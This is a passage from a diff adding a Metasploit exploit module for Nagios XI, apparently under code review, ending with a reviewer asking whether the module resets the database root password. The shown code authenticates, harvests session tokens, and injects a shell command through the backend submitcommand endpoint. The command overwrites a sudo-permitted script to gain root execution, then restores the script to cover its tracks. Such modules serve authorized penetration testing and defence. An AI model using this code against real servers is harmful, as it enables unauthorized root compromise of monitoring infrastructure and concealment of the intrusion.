modules/exploits/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.rb

```diff
@@ -0,0 +1,367 @@
+          'vars_post'=> {
+              'nsp' => login_nsp,
+              'page' => 'auth',
+              'debug' => '',
+              'pageopt' => 'login',
+              'username' => username,
+              'password' => password,
+              'loginButton' => ''
+          }
+      })
+
+      if !res || res.code != 302
+        fail_with(Failure::Unknown, 'STEP 4.2 Could not get authed nsp string.')
+      end
+
+      authed_nagiosxi = parse_nagiosxi(res)
+      print_status "STEP 4.2: authed_nagiosxi #{authed_nagiosxi}"
+      return authed_nagiosxi
+    end
+
+    def parse_nsp_str(resp_body)
+      nsp_strs = /var nsp_str = "(.+)";\n/.match(resp_body)
+
+      unless nsp_strs || nsp_strs.length < 2
+          fail_with(Failure::NotFound, 'Could not find nsp_str')
+      end
+
+      return nsp_strs[1]
+    end
+
+    def parse_nagiosxi(res)
+      cookie = res.get_cookies
+      matches = /.*nagiosxi=(.+);/.match(cookie)
+
+      unless matches || matches.length < 2
+        fail_with(Failure::NotFound, 'Could not find nagiosxi cookie')
+      end
+
+      return matches[1]
+    end
+
+    def execute_command(cmd, opts = {})
+      backup_file = rand_text_alpha(rand(5) + 10)
+
+      cmd_execution = "$(cp /usr/local/nagiosxi/scripts/reset_config_perms.sh /usr/local/nagiosxi/scripts/#{backup_file} ; echo \"#{cmd}\" > /usr/local/nagiosxi/scripts/reset_config_perms.sh ; sudo /usr/local/nagiosxi/scripts/reset_config_perms.sh) &"
+
+      cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/#{backup_file} /usr/local/nagiosxi/scripts/reset_config_perms.sh)"
+      opts_exec = {
+          'uri'=> '/nagiosxi/backend/index.php',
+          'method' => 'POST',
+          'ctype' => 'application/x-www-form-urlencoded',
+          'cookie' => "nagiosxi=#{@nagiosxi}",
+          'vars_get' => {
+              'cmd'=>'submitcommand',
+              'command'=>'1111',
+              'command_data'=> cmd_execution
+          }
+      }
+
+      opts_cleanup = {
+          'uri'=> '/nagiosxi/backend/index.php',
+          'method' => 'POST',
+          'ctype' => 'application/x-www-form-urlencoded',
+          'cookie' => "nagiosxi=#{@nagiosxi}",
+          'vars_get' => {
+              'cmd'=>'submitcommand',
+              'command'=>'1111',
+              'command_data'=> cmd_cleanup
+          }
+      }
+
+      print_status "STEP 5.1: executing payload"
+      res = send_request_cgi(opts_exec)
+
+      if !res || res.code != 200
+        fail_with(Failure::Unknown, 'STEP 5.1: Command execution failed')
+      end
+
+      print_status "STEP 5.2: removing scripts from disc"
+      res = send_request_cgi(opts_cleanup)
+
+      if !res || res.code != 200
+        fail_with(Failure::Unknown, 'STEP 5.2: Command cleanup failed')
+      end
+    end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'STEP 0: Vulnerable version not found! punt!')
+    end
+
+
+    set_db_user('root', 'nagiosxi')
```

Comment:
If `root` was configured with a non-default password, would this overwrite/change the `root` password?